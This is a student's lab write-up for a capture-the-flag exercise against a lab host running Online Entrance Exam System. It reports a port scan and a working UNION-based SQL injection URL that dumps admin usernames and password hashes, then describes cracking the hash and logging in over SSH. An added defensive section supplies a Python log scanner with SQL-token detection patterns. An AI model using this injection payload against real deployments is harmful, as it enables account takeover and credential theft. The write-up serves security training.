# Lab 9.1: Exploit Gloin

**Deliverable 1. Provide the following information, including commands and screenshots. Create a tech journal page that covers the following.**

* **Target IP Address**

<figure><img src="https://lh5.googleusercontent.com/cnfcKow3FMgfMwraUfGEVsxqWV8cw601RKNWtu32qGGz94Z0YbWx1ZGoioP5oCD1iKnP2aKz0Tc3I5yKkdpaWDujxGHg3pwK2DsMVEfgAXa1CW8ylr4J6Kf71vDuDD4IGxO1n-n5KECNlD5CdpQgAOI" alt=""><figcaption></figcaption></figure>

```
10.0.5.31
```

* **Open Ports**

<figure><img src="https://lh3.googleusercontent.com/6llAK67TrlElA3v5OkBWqJXvR-jCfwr3GOfnNVSdCMUx4bp-mXJ66irzGrWQbebn4BYX34r3e0HWGnnh0tP_Om5_EswSB6pQo46CdFRM7L-emVmvzva-mJZq1qu1VPayB6BjF07iUambhiZBhb6mImc" alt=""><figcaption></figcaption></figure>

```
22
443
3389
```

* **Discovered Vulnerability**

<figure><img src="https://lh4.googleusercontent.com/1tzg0fBiFQo7QEZ6yDtLJx1U7UFUuqpOR37I01nlEYBjxW6Cb3XogPOr3_TURKjFQAW_WLgMpLYYbI1_m3jC2zgoGcGkBBS3q0IfuTAeWtvU3XMERWjGJX2tZJudvNtRJWTbkVNwyvr9jbj2e3PpuZc" alt=""><figcaption></figcaption></figure>

Found that Online Entrance Exam System has an SQL vulnerability.

<figure><img src="https://lh6.googleusercontent.com/wUcxIl12Ivy5aXeLmIWL76EH8sCzvOiu9j4WPEiRhAi-rjhdq8NjYXjGaZElLLlQrjI3GE3orUNd6wERXggmIS4IW5bVAUggN0DTXaL-ZWfq-N9Kp3z_f5-stc0r9_2OvZtAkJZ3OfmZqbN8B3PLZLQ" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
https://10.0.5.31/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;
```

{% endcode %}

The line above will dump the admin hash.

<figure><img src="https://lh3.googleusercontent.com/NZrhlGjR8kwia0NF_f6KfdUvpXl3fHljoo_MinICMuiIHVni2vW3JVrtDYmKf0US7A1srpOZctjOOrIgQneUxEFYFJP_uDT1pC_6v9nWs5x3fnrjo9Y7RWTyZlHSmP9UAqZwivjU6mo6JTImy22-tCM" alt=""><figcaption></figcaption></figure>
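The defensive counterpart to the request above, as an added example that is not part of the original journal or of the application's code: an allow-list check for the `id` parameter and a log review that flags requests failing it. It assumes exam ids are plain integers and that the web server writes common-log-format access lines; the log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines. The second request reuses the query string
# shown above; client addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] '
    '"GET /entrance_exam/take_exam.php?id=3 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2024:10:02:17 +0000] '
    '"GET /entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;'
    '%27||password,3,4,5,6,7+FROM+admin_list; HTTP/1.1" 200 5344',
    '192.0.2.10 - - [01/Jan/2024:10:03:40 +0000] '
    '"GET /entrance_exam/index.php HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_TOKEN_RE = re.compile(r"\b(?:union|select|from)\b|'|\|\|", re.IGNORECASE)


def valid_exam_id(raw):
    """Allow-list check (assumes exam ids are plain integers)."""
    return re.fullmatch(r"[0-9]{1,10}", raw) is not None


def flag_requests(lines):
    """Return (client, decoded id, SQL tokens seen) for each rejected id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/take_exam.php"):
            continue
        # parse_qs decodes %27 to ' and + to a space, as the server would.
        for raw_id in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not valid_exam_id(raw_id):
                tokens = sorted({t.group(0).lower()
                                 for t in SQL_TOKEN_RE.finditer(raw_id)})
                hits.append((client, raw_id, tokens))
    return hits


if __name__ == "__main__":
    for client, raw_id, tokens in flag_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric id {raw_id!r}; tokens: {tokens}")
```

Rejecting non-numeric ids narrows the input, but the underlying fix is for the page to pass `id` to the database as a bound parameter instead of concatenating it into the SQL text.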

A peer told me to use CrackStation for this step.

<figure><img src="https://lh3.googleusercontent.com/l-AvNhWFWvbiyChcyrdMlIcsOAmmQHOkDRtE9nqgDOZHlYOwrOzs-4SqYh9kHPgK9A2THkdPxAC0RMIPxT986A-p1_oqzzFjg3D2EG9vcnG3eYva_L0i4pKSAKMKvYL026TOiWElw6b9mE5zNKLE9es" alt=""><figcaption></figcaption></figure>

* **How you achieved a foothold**

I found the exploit for Online Entrance Exam System by using searchsploit, finding a MySQL exploit, and then looking at Exploit-DB and reading what was there.

<figure><img src="https://3672032160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F3Qsmtw2a8kQMt8K7P5qR%2Fuploads%2FW7Jm7Ugv8rj5Afc7Gvmo%2Fimage.png?alt=media&#x26;token=7c575d5f-062c-4ce5-a54f-669b69ba545e" alt=""><figcaption></figcaption></figure>

* **How you achieved root/Administrative level compromise**

I cracked the hash for the admin user and then SSHed into the machine using administrator as the user because it's a Windows machine.

* **User Flag**

<figure><img src="https://lh4.googleusercontent.com/yHW8Uhw_6BuX3sc91M0MUMtuNpyuoDwQUdlPESuY31Bi5A4syD92HbzF5v48FEsyZ9MtdQOy-RJ2D1j_fasZgXbiV-OwZK2txUhlM9Fik9zRsWvaX3AN-oscMBGrdZIHoLTVVgVMppZxjWWMCWWALS4" alt=""><figcaption><p>User Flag</p></figcaption></figure>

* **Root Flag**

<figure><img src="https://lh5.googleusercontent.com/GVwxGxgCoViG1I76kR4q_VmMjNioFQl32O-ciki3_3x8PxI3gtyfAc8VyCRdLNZW9NGBMI0W8W81tZ8ksB2jB8H0ExJ6XKORcfm5-emUAtdZy5fvy-B4YAeicPQXrQbgPj39JgyNRdDGmDwe05Ckv7Y" alt=""><figcaption><p>Root Flag</p></figcaption></figure>

### Overview

I didn't have much trouble with this lab. I was very thankful for my peer, who told me to use CrackStation instead of trying other tools. It made this process a lot easier. I did find it very fun to not have much information and to have to get a foothold on our own.
